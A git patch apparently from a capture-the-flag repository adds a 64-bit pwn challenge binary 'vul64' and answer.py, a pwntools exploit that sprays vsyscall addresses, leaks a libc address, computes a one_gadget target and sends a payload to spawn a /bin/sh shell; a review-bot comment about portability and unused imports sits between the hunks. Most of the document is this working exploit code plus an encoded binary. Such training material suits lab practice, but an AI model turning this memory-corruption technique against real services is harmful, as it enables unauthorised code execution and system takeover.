From 36877e5aa8788047e1045522325d3e89a9a3bc75 Mon Sep 17 00:00:00 2001
From: Jack Ren
Date: Wed, 10 Nov 2021 23:00:26 +0800
Subject: [PATCH] vsyscall/vul64
---
 vsyscall/vul64/answer.py | 34 ++++++++++++++++++++++++++++++++++
 vsyscall/vul64/vul64 | Bin 0 -> 6128 bytes
 2 files changed, 34 insertions(+)
 create mode 100644 vsyscall/vul64/answer.py
 create mode 100755 vsyscall/vul64/vul64
diff --git a/vsyscall/vul64/answer.py b/vsyscall/vul64/answer.py
new file mode 100644
index 0000000..298c1e1
--- /dev/null
+++ b/vsyscall/vul64/answer.py
@@ -0,0 +1,34 @@
+#!/usr/bin/python2
+# -*- coding:utf-8 -*-
+
+from pwn import *
+from LibcSearcher import *
+import os
+import time
+import struct
+context(arch = "amd64",os = "linux", log_level = "debug")
+
+# context.log_level = "debug"
+p = process('./vul64')
+elf = ELF('./vul64')
+
+#gdb.attach(p, "break *0x0000555555554a2b")
+
+#time.sleep(10)
+ret_addr = 0xffffffffff600400
+
+with open('input.txt', 'w') as f:
+    f.write(p64(ret_addr) * 30 + '\x2c')
+
+p.send(p64(ret_addr) * 30 + '\x2c')
+p.recvuntil("I have a gift for yoooou\n")
+write_libc = u64(p.recv(8))
+p.recvuntil("Want my flag? Keep going!\n")
+
+libc = LibcSearcher('write', write_libc)
+libc_base = write_libc - libc.dump('write')
+system_libc = libc_base + 0x4f3d5 # one_gadget Shift
+
+
+p.send("/bin/sh\x00" + '0' * 0x2f + p32(0x44) + p64(system_libc) + '\n')
+p.interactive()
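Review bot: The constant `0x4f3d5` on the `system_libc` line is a one_gadget offset for one particular libc build, yet the hunk never records which build it was resolved against, and `LibcSearcher` can match several candidate libcs from a single `write` leak, so the script fails without explanation on any other build. A comment such as `# one_gadget offset, valid only for <libc build placeholder>; re-derive if LibcSearcher resolves a different libc` on that line would make the writeup reproducible. `os`, `time` and `struct` are imported but never used, and `elf` is assigned and never read. The `input.txt` block writes the same payload that the following `p.send` transmits, so it is either a debug leftover or deserves a comment saying why the file copy is kept. Note also that `p64(...) + '\x2c'` relies on Python 2 str/bytes unification, consistent with the `#!/usr/bin/python2` shebang, so the file is not runnable under Python 3 as written.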
diff --git a/vsyscall/vul64/vul64 b/vsyscall/vul64/vul64 new file mode 100755 index 0000000000000000000000000000000000000000..8f0a22de7186939a31a999eebaa223716469dea2 GIT binary patch literal 6128 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 Kn}p19O#cs)J#^9l literal 0 HcmV?d00001